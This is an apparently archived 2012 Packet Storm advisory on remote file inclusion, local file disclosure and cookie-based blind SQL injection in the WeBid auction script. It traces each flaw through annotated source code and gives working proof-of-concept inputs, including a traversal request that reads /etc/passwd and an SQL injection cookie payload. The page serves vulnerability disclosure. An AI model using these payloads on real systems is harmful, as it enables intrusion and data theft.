exploit the possibilities

WeBid 1.0.4 RFI / File Disclosure / SQL Injection

WeBid 1.0.4 RFI / File Disclosure / SQL Injection
Posted Aug 17, 2012
Authored by dun

WeBid versions 1.0.4 and below suffer from local file disclosure, remote file inclusion, and remote SQL injection vulnerabilities.

tags | exploit, remote, local, vulnerability, code execution, sql injection, file inclusion
MD5 | ac9c4aac1cb4fe45a1096c644e47b339

WeBid 1.0.4 RFI / File Disclosure / SQL Injection

Change Mirror Download
:::::::-.   ...    ::::::.    :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-08-17 ]
################################################
# [ WeBid <= 1.0.4 ] Multiple Vulnerabilities #
################################################
#
# Script: "Open source php/mysql fully featured auction script"
#
# Vendor: http://www.webidsupport.com/
# Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/
#
################################################
# [RFI] ( allow_url_include = On; register_globals = On; )
# PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt?
#
# File: ./WeBid/loader.php (lines: 15-60)
# ..cut..
# ob_start('ob_gzhandler');
# header("Content-type: text/javascript");
# include 'includes/checks/files.php'; // 1 ( Definition of $file_hashs array )
# if (isset($_GET['js']))
# {
# $js = explode(';', $_GET['js']); // 3 js = admin/logout.php (for example)
# foreach ($js as $val)
# {
# $ext = substr($val, strrpos($val, '.') + 1); // 4
# if ($ext == 'php') // 4
# {
# if (check_file($val)) // 5
# {
# include $val; // 10 include admin/logout.php
# }
# }
# ..cut..
# }
# }
# ob_end_flush();
#
# function check_file($file)
# {
# global $file_hashs; // 6
# $tmp = $file_hashs;
# $folders = explode('/', $file); // 7 $folders = Array([0] => admin, [1] => logout.php)
# foreach ($folders as $val) // 8 This loop checks if parts of $folders are in $file_hashs
# {
# if (isset($tmp[$val]))
# {
# $tmp = $tmp[$val];
# }
# else
# {
# return false;
# }
# }
# return true; // 9 admin/logout.php passed
# }
# ..cut..
#
# File: ./WeBid/includes/checks/files.php (lines: 2-19)
# ..cut..
# $file_hashs = array( // 2 List of files that can be included.
# ..cut..
# 'admin' => array( // 2
# 'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2
# ..cut..
# ),
# ..cut..
# );
#
# File: ./WeBid/admin/logout.php (lines: 16-17)
# ..cut.. // 11 common.inc.php file contains a definition of $include_path
# include '../includes/common.inc.php'; // 11 Failed, because loader.php is in root path
# include $include_path . 'functions_admin.php'; // 12 *[RFI] $include_path is not set by script
# ..cut.. // 12 If register_globals is On, we can set $include_path
#
################################################
# [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 )
# PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
#
# File: ./WeBid/getthumb.php (lines: 17-52)
# ..cut..
# $w = (isset($_GET['w'])) ? $_GET['w'] : ''; // 1
# $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : ''; // 2
# $nomanage = false;
# ..cut..
# if (!isset($_GET['fromfile'])) // 3
# {
# ErrorPNG('params empty');
# exit;
# }
# elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r')) // 4
# {
# ErrorPNG('img does not exist');
# exit;
# }
#
# if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile))) // 5
# {
# $img = getimagesize($fromfile);
# if ($img[2] == 1)
# {
# $img['mime'] = 'image/png';
# }
# header('Content-type: ' . $img['mime']);
# echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD]
# }
# }
# ..cut..
#
################################################
# [Blind SQL Injection] ( magic_quotes_gpc = Off; )
# PoC:
# http://localhost/WeBid/contents.php
# GET /WeBid/contents.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Cookie: WEBID_ONLINE=-1' OR 1=1--
#
# File: ./WeBid/contents.php (lines: 15, 38)
# ..cut..
# include 'includes/common.inc.php';
# ..cut..
# include 'header.php'; // 1
# ..cut..
#
# File: ./WeBid/header.php (line: 26)
# ..cut..
# $counters = load_counters(); // 2
# ..cut..
#
# File: ./WeBid/includes/functions_global.php (line: 287-320)
# ..cut..
# function load_counters() // 3
# {
# ..cut..
# if (!$user->logged_in)
# {
# if (!isset($_COOKIE['WEBID_ONLINE']))
# {
# $s = md5(rand(0, 99) . session_id());
# setcookie('WEBID_ONLINE', $s, time() + 900);
# }
# else
# {
# $s = $_COOKIE['WEBID_ONLINE']; // 4
# setcookie('WEBID_ONLINE', $s, time() + 900);
# }
# }
# ..cut..
# $query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL]
# $res = mysql_query($query);
# $system->check_mysql($res, $query, __LINE__, __FILE__);
# ..cut..
#
### [ dun / 2012 ] #############################


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    1 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close